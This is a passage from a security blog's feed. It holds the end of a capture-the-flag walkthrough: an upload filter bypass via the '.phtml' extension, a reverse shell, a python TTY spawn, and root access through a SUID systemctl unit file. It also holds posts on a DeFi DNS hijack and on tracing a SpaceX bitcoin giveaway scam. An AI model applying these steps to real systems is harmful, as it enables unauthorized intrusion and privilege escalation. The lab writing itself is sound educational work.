Clear the selected positions.\n<p> </p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/clear.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/clear-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/clear-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/clear-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/clear-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/clear-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/clear-2xl.png 1600w\" alt=\"clear positions\" width=\"279\" height=\"318\" data-is-external-image=\"true\"></figure></figure>\nHighlight the filename and add the position.\n<p> </p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/filename.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/filename-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/filename-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/filename-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/filename-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/filename-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/filename-2xl.png 1600w\" alt=\"highlight new position\" width=\"282\" height=\"110\" data-is-external-image=\"true\"></figure></figure>\n<p>Head over to the payload section and add some extensions to the simple list payload option. 
We'll be trying</p>\n<ul>\n<li>html</li>\n<li>php1</li>\n<li>php2</li>\n<li>php5</li>\n<li>phtml</li>\n</ul>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/payload-list.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/payload-list-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/payload-list-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/payload-list-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/payload-list-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/payload-list-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/payload-list-2xl.png 1600w\" alt=\"payload list\" width=\"583\" height=\"316\" data-is-external-image=\"true\"></figure></figure>\n<p>Finally disable URL-encode and start the attack! Results from the intruder always look identical, so we search for the one that's different from the rest. If it exists, it's our winner!</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/compromise.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/compromise-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/compromise-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/compromise-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/compromise-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/compromise-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/compromise-2xl.png 1600w\" alt=\"access gained\" width=\"682\" height=\"247\" data-is-external-image=\"true\"></figure></figure>\n<p>\".phtml\" seems to have worked. 
Let's navigate to the \"/uploads/\" directory to confirm.</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/we-in.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/we-in-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/we-in-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/we-in-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/we-in-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/we-in-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/we-in-2xl.png 1600w\" alt=\"proof of compromise\" width=\"484\" height=\"231\" data-is-external-image=\"true\"></figure></figure>\nNow that we have proof of compromise we can go ahead and execute the reverse shell by opening it in the browser.\n<p> </p>\n<h2>INITIAL ACCESS</h2>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/initial-access.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/initial-access-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/initial-access-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/initial-access-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/initial-access-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/initial-access-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/initial-access-2xl.png 1600w\" alt=\"initial access\" width=\"1440\" height=\"207\" data-is-external-image=\"true\"></figure></figure>\n<p>We're in! 
We do some basic prying to see who we are on the system, who the other users are and what privileges they have.</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/user-flag.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/user-flag-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/user-flag-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/user-flag-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/user-flag-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/user-flag-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/user-flag-2xl.png 1600w\" alt=\"user flag\" width=\"728\" height=\"262\" data-is-external-image=\"true\"></figure></figure>\n<p>And we have our user flag! With that, let's check out some SUID binaries. </p>\n<h2>PRIVILEGE ESCALATION</h2>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/suid.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/suid-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/suid-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/suid-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/suid-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/suid-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/suid-2xl.png 1600w\" alt=\"SUID\" width=\"661\" height=\"678\" data-is-external-image=\"true\"></figure></figure>\n<p>We have a bunch of interesting stuff to use to our advantage, but first let's spawn a TTY shell to get rid of some restrictions.</p>\n<blockquote>\n<p>python -c 'import pty; pty.spawn(\"/bin/bash\")'</p>\n</blockquote>\n<p>In case you were wondering, I haven't memorised all 
these commands yet. I use <a href=\"https://github.com/LasCC/Hack-Tools\" target=\"_blank\" rel=\"noopener noreferrer\">Hack Tools</a>, check them out and buy them a coffee! Remember, one of the binaries we found was </p>\n<blockquote>\n<p>/bin/systemctl</p>\n</blockquote>\n<p>It's especially interesting because systemctl controls the systemd service manager. This means that we can mess around with <strong>/etc/system/systemd. </strong>I'll navigate to the /opt directory and we'll create an environment variable from there.</p>\n<blockquote>\n<p>priv=$(mktemp).service</p>\n</blockquote>\n<p>Next we write a unit file to the path held in our environment variable.</p>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/service.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/service-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/service-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/service-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/service-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/service-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/service-2xl.png 1600w\" alt=\"service\" width=\"742\" height=\"184\" data-is-external-image=\"true\"></figure></figure>\n<p>With that we just created a simple service that executes the \"cat\" command on the root flag and writes it in the /opt directory we're in. Since the user flag was in a file called user.txt, my bet is that the root flag is called root.txt. 
When the service runs successfully the flag should be saved as \"root-flag\" in the /opt directory.</p>\n<p>Let's run the unit file using /bin/systemctl</p>\n<blockquote>\n<p>/bin/systemctl link $priv</p>\n<p>/bin/systemctl enable --now $priv</p>\n</blockquote>\n<figure class=\"post__image post__image--center\"><figure class=\"is-loaded\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/3/root-flag.png\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/3/responsive/root-flag-xs.png 300w, https://blog.syncpundit.io/media/posts/3/responsive/root-flag-sm.png 480w, https://blog.syncpundit.io/media/posts/3/responsive/root-flag-md.png 768w, https://blog.syncpundit.io/media/posts/3/responsive/root-flag-lg.png 1024w, https://blog.syncpundit.io/media/posts/3/responsive/root-flag-xl.png 1360w, https://blog.syncpundit.io/media/posts/3/responsive/root-flag-2xl.png 1600w\" alt=\"root flag\" width=\"1446\" height=\"182\" data-is-external-image=\"true\"></figure></figure>\n<p>And with that you can run whatever command with root privileges as a service. RPaaS🤓. Happy hacking!</p>\n</div>",
"image": "https://blog.syncpundit.io/media/posts/3/vulversity.png",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Walkthroughs"
],
"date_published": "2021-07-23T23:37:00+02:00",
"date_modified": "2021-09-20T19:26:12+02:00"
},
{
"id": "https://blog.syncpundit.io/pancakeswap-and-cream-finance-dns-attack/",
"url": "https://blog.syncpundit.io/pancakeswap-and-cream-finance-dns-attack/",
"title": "PancakeSwap and CREAM Finance DNS Attack",
"summary": "A few hours ago CREAM Finance released a tweet warning their users NOT TO ENTER any seed phrases on their site as their…",
"content_html": "<p><span style=\"font-weight: 400;\">A few hours ago CREAM Finance released </span><span style=\"color: #3598db;\"><a href=\"https://twitter.com/CreamdotFinance/status/1371448627663491088?s=20\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">a tweet</a></span><span style=\"font-weight: 400;\"> warning their users NOT TO ENTER any seed phrases on their site as their DNS has been compromised.</span></p>\n<figure class=\"post__image\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/2//pan.png\" alt=\"cream tweet\" width=\"601\" height=\"371\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/2//responsive/pan-xs.png 300w ,https://blog.syncpundit.io/media/posts/2//responsive/pan-sm.png 480w ,https://blog.syncpundit.io/media/posts/2//responsive/pan-md.png 768w ,https://blog.syncpundit.io/media/posts/2//responsive/pan-lg.png 1024w ,https://blog.syncpundit.io/media/posts/2//responsive/pan-xl.png 1360w ,https://blog.syncpundit.io/media/posts/2//responsive/pan-2xl.png 1600w\"></figure>\n<p><span style=\"font-weight: 400;\">A little over an hour later PancakeSwap released </span><a href=\"https://twitter.com/PancakeSwap/status/1371470368058183687\"><span style=\"font-weight: 400;\"><span style=\"color: #3598db;\">a tweet</span></span></a><span style=\"font-weight: 400;\"> of their own, warning their users not to use their site either. 
They stated that they suspected an attack similar to the one on CREAM, and followed up with a </span><span style=\"color: #3598db;\"><a href=\"https://twitter.com/PancakeSwap/status/1371471934999777281\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">confirmation</span></a></span><span style=\"font-weight: 400;\"> a few minutes later.</span></p>\n<figure class=\"post__image\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/2//pan1.png\" alt=\"pancakeswap tweet\" width=\"597\" height=\"807\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/2//responsive/pan1-xs.png 300w ,https://blog.syncpundit.io/media/posts/2//responsive/pan1-sm.png 480w ,https://blog.syncpundit.io/media/posts/2//responsive/pan1-md.png 768w ,https://blog.syncpundit.io/media/posts/2//responsive/pan1-lg.png 1024w ,https://blog.syncpundit.io/media/posts/2//responsive/pan1-xl.png 1360w ,https://blog.syncpundit.io/media/posts/2//responsive/pan1-2xl.png 1600w\"></figure>\n<p> </p>\n<h1><span style=\"font-weight: 400;\">What is DNS?</span></h1>\n<p><span style=\"font-weight: 400;\">DNS is perhaps one of the most important pillars of the internet. It’s the system that maps domain names to their corresponding IP addresses, amongst other things. Basically, it is the internet’s address book. When you visit google.com, two things are expected to happen:</span></p>\n<ol>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">You expect to see that search bar</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Your computer expects the IP address of the servers that are hosting google.com so that it can show you said search bar</span></li>\n</ol>\n<p><span style=\"font-weight: 400;\">This is where DNS comes in, to mediate amongst you, your computer and google.com. 
You need to see google.com but you don’t know its IP address; your computer wants to give you google.com but it needs to know its IP address; and finally, the servers at google.com are open to serving anyone the contents of google.com, but they need to know which IP address to send that nice search bar to. DNS is the universal translator that helps your computer find out which IP address it needs to contact to get hold of google.com, after which it finally delivers the crisp google.com to your browser.</span></p>\n<p><span style=\"font-weight: 400;\">From google.com’s perspective, DNS has records that help computers find the information they need to communicate with google.com. Those records point any computer searching for google.com to the correct server(s) hosting and serving the contents of google.com. </span></p>\n<p> </p>\n<h1><span style=\"font-weight: 400;\">What is a DNS attack?</span></h1>\n<p><span style=\"font-weight: 400;\">Simply put, it’s an attack that involves malicious actors manipulating the mapping process between domains and IP addresses. In the case of CREAM Finance and PancakeSwap, the attackers got hold of the companies’ DNS infrastructure and changed the destination IP addresses of cream.finance and pancakeswap.finance to the attackers’ IP addresses, which are hosting phishing pages. So right now anyone who visits cream.finance or pancakeswap.finance is being routed to a fake version of the site and solicited for seed phrases, which should </span><span style=\"color: #e03e2d;\"><strong>NEVER BE GIVEN TO ANYONE!</strong><span style=\"font-weight: 400;\"> </span></span></p>\n<p> </p>\n<h1><span style=\"font-weight: 400;\">How to protect your website from DNS hijacking?</span></h1>\n<p><span style=\"font-weight: 400;\">If you have a website, your DNS is most likely managed through your domain’s registrar. The best way to protect your DNS from attacks is to guard access to the registrar accounts. 
Follow your standard operational security practices - use strong, unique passwords, 2FA and a VPN, check haveibeenpwned.com, etc. </span></p>\n<p><span style=\"font-weight: 400;\">Take good care of your DNS records and settings. Make sure things like zone transfers from external IP addresses are disabled. Also, make sure you have </span><a href=\"https://dmarcian.com/what-is-dkim/\"><span style=\"font-weight: 400;\">DKIM</span></a><span style=\"font-weight: 400;\">, </span><a href=\"https://dmarcian.com/what-is-spf/\"><span style=\"font-weight: 400;\">SPF</span></a><span style=\"font-weight: 400;\">, </span><a href=\"https://dmarcian.com/why-dmarc/\"><span style=\"font-weight: 400;\">DMARC</span></a><span style=\"font-weight: 400;\"> and</span> <a href=\"https://www.icann.org/resources/pages/dnssec-what-is-it-why-important-2019-03-05-en\"><span style=\"font-weight: 400;\">DNSSEC</span></a><span style=\"font-weight: 400;\"> set up and properly configured. Ultimately, having an action plan is useful in the event that something goes wrong, including how you will inform users of the attack.</span></p>",
"image": "https://blog.syncpundit.io/media/posts/2/pan2.png",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Research"
],
"date_published": "2021-03-15T22:50:00+02:00",
"date_modified": "2021-09-20T20:00:34+02:00"
},
{
"id": "https://blog.syncpundit.io/spacex-bitcoin-giveaway/",
"url": "https://blog.syncpundit.io/spacex-bitcoin-giveaway/",
"title": "SpaceX Bitcoin Giveaway?",
"summary": "On Saturday 13 June, SpaceX successfully launched their ninth Starlink mission. Just 24 hours later, a total of nearly 9 BTC (almost USD…",
"content_html": "<p><span style=\"font-weight: 400;\">On Saturday 13 June, SpaceX successfully </span><span style=\"color: #3598db;\"><a href=\"https://www.spacex.com/launches/\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">launched their ninth Starlink mission</span></a></span><span style=\"font-weight: 400;\">. </span><span style=\"font-weight: 400;\">Just 24 hours later, a total of nearly 9 BTC (almost USD 84 000 at the time of writing this) was lost to a SpaceX bitcoin giveaway scam. Yes, a SpaceX, bitcoin, giveaway.</span></p>\n<h1><span style=\"font-weight: 400;\">Brief History</span></h1>\n<p><span style=\"font-weight: 400;\">In November 2018, the Independent </span><span style=\"color: #3598db;\"><a href=\"https://www.independent.co.uk/life-style/gadgets-and-tech/news/elon-musk-bitcoin-scam-twitter-hackers-cryptocurrency-a8620436.html\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">published an article</span></a></span><span style=\"font-weight: 400;\"> about a wave of phishing attacks that swindled people out of thousands of dollars in bitcoin. The attackers had hijacked a few Twitter accounts with high followings, changed them to emulate Elon Musk, CEO of SpaceX and Tesla, and launched a fake giveaway campaign. For a while the scams ceased, until they reappeared recently.</span></p>\n<p><span style=\"font-weight: 400;\">Several weeks ago, I received a report of a phishing attack hosted at spacex[.]money. 
</span><span style=\"font-weight: 400;\">I began looking into this and during the investigation I discovered a horde of additional domains set up by the attackers, including:</span></p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">spacex-tesla[.]me</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">spacex[.]money</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">spacex-btc[.]net</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">spacex-btc[.]info</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">spacex-btc[.]com</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">spacex-btc[.]live</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">spaceufx[.]site</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">btcspacex[.]com</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">officialelonmusk[.]com</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">elonmusckbtc[.]com</span></li>\n</ul>\n<p> </p>\n<h1><span style=\"font-weight: 400;\">The Second Wave</span></h1>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed.png\" alt=\"\" width=\"1600\" height=\"1425\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-2xl.png 1600w\">\n<figcaption ><span style=\"font-weight: 400;\">Photo credits: </span><a href=\"https://news.bitcoin.com/spacex-bitcoin-scam-btc-giveaway-elon-musk-nasa-launch/\"><span 
style=\"font-weight: 400;\">https://news.bitcoin.com/spacex-bitcoin-scam-btc-giveaway-elon-musk-nasa-launch/</span></a></figcaption>\n</figure>\n<p><span style=\"font-weight: 400;\">The second wave of attacks was fundamentally similar to the first wave - </span><span style=\"color: #3598db;\"><a href=\"https://www.phishfort.com/blog/most-common-social-media-phishing-attacks\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">hijacked accounts</span></a></span><span style=\"font-weight: 400;\"> with high followings and fake giveaway campaigns. Only this time they leveraged YouTube, and the muse was not just Elon Musk but SpaceX too. The first collection of these YouTube channels streamed a live feed of Elon Musk being interviewed for a SpaceX convention. The second bunch were no longer streaming live, but still used interviews of Elon Musk to trick people into giving them their hard-earned assets.</span></p>\n<figure class=\"post__image\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-1-2.png\" alt=\"\" width=\"1202\" 
height=\"783\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-2-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-2-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-2-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-2-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-2-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-2-2xl.png 1600w\"></figure><figure class=\"post__image\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-1.png\" alt=\"\" width=\"1202\" height=\"783\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-1-2xl.png 1600w\"></figure>\n<p><span style=\"font-weight: 400;\">This is an example of one of the attacks live on YouTube. The phishing sites could be found in the videos’ descriptions. 
The sites follow a typical </span><span style=\"color: #3598db;\"><a href=\"https://www.phishfort.com/blog/staying-safe-online\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">trust trading</span></a></span><span style=\"font-weight: 400;\"> format, </span><span style=\"font-weight: 400;\">where victims are encouraged to “send X amount of bitcoin with the promise of receiving 2X back”</span><span style=\"font-weight: 400;\">.</span></p>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-2.png\" alt=\"\" width=\"1600\" height=\"772\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-2-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-2-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-2-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-2-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-2-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-2-2xl.png 1600w\">\n<figcaption ><a href=\"https://spacex-btc.info/\"><span style=\"font-weight: 400;\">https://spacex-btc.info/#</span></a></figcaption>\n</figure>\n<p> </p>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-3-2.png\" alt=\"\" width=\"1600\" height=\"769\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-3-2-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-3-2-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-3-2-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-3-2-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-3-2-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-3-2-2xl.png 1600w\">\n<figcaption ><a 
href=\"https://spacex-btc.net/\"><span style=\"font-weight: 400;\">https://spacex-btc.net/#</span></a></figcaption>\n</figure>\n<p> </p>\n<p><span style=\"font-weight: 400;\">The particular phishing site above was set up with this bitcoin address: </span><span style=\"color: #3598db;\"><a href=\"https://www.blockchain.com/btc/address/3Nra2wH6FxvuVwwZQj3EH5xHjUk68QwRBP\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">https://www.blockchain.com/btc/address/3Nra2wH6FxvuVwwZQj3EH5xHjUk68QwRBP</span></a></span></p>\n<p><span style=\"font-weight: 400;\">As of Sunday the 14</span><span style=\"font-weight: 400;\">th</span><span style=\"font-weight: 400;\"> of June, this scam had made a total of </span><span style=\"font-weight: 400;\">8.98024788 BTC </span><span style=\"font-weight: 400;\">from only 14 transactions.</span></p>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-4.png\" alt=\"\" width=\"1565\" height=\"544\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-4-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-4-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-4-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-4-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-4-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-4-2xl.png 1600w\">\n<figcaption ><span style=\"font-weight: 400;\">https://www.blockchain.com/btc/address/3Nra2wH6FxvuVwwZQj3EH5xHjUk68QwRBP</span></figcaption>\n</figure>\n<p><span style=\"font-weight: 400;\">As can be expected, none of the bitcoin sent was reimbursed as the scam had claimed. 
They managed to make this much money all in one night, but how?</span></p>\n<h2><span style=\"font-weight: 400;\">Following the money</span></h2>\n<p><span style=\"font-weight: 400;\">I will take a look at one of the addresses and trace where the money went.</span></p>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-5.png\" alt=\"\" width=\"701\" height=\"535\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-5-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-5-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-5-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-5-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-5-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-5-2xl.png 1600w\">\n<figcaption ><span style=\"font-weight: 400;\">1ELonMUSK14JSGNYAcPJNqubuFByZPyjcj</span></figcaption>\n</figure>\n<p> </p>\n<h3><span style=\"font-weight: 400;\">Following one of the branches</span></h3>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-6.png\" alt=\"\" width=\"581\" height=\"624\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-6-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-6-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-6-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-6-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-6-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-6-2xl.png 1600w\">\n<figcaption >Branch</figcaption>\n</figure>\n<p><span style=\"font-weight: 400;\">Just from this branch the money was bounced through two addresses before it was spent. 
Overall, the branch looks like this:</span></p>\n<figure class=\"post__image\" ><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-7.png\" alt=\"\" width=\"1011\" height=\"491\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-7-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-7-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-7-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-7-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-7-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-7-2xl.png 1600w\">\n<figcaption >Bird's eye view</figcaption>\n</figure>\n<p> </p>\n<p><span style=\"font-weight: 400;\">Some people were victims of multiple attacks. </span></p>\n<figure class=\"post__image\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/1/unnamed-8.png\" alt=\"\" width=\"960\" height=\"413\" sizes=\"(max-width: 48em) 100vw, 768px\" 
srcset=\"https://blog.syncpundit.io/media/posts/1/responsive/unnamed-8-xs.png 300w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-8-sm.png 480w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-8-md.png 768w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-8-lg.png 1024w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-8-xl.png 1360w ,https://blog.syncpundit.io/media/posts/1/responsive/unnamed-8-2xl.png 1600w\"></figure>\n<h2><span style=\"font-weight: 400;\">Why did the scam work?</span></h2>\n<h3><span style=\"font-weight: 400;\">News Cycle</span></h3>\n<p><span style=\"font-weight: 400;\">With SpaceX’s successful launch, the attackers were presented with a ripe opportunity to capitalise on the news. Since all eyes are on SpaceX, a SpaceX-themed attack has thousands of potential victims waiting to take the bait. </span></p>\n<h3><span style=\"font-weight: 400;\">Vanity Address</span></h3>\n<p><span style=\"font-weight: 400;\">Some of the addresses used in the attacks were </span><span style=\"color: #3598db;\"><a href=\"https://news.bitcoin.com/how-to-generate-a-bitcoin-vanity-address/#:~:text=A%20bitcoin%20vanity%20address%20is,name%20of%20the%20wallet's%20owner.\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">vanity addresses</span></a></span><span style=\"font-weight: 400;\">, chosen to create a sense of trust and legitimacy. 
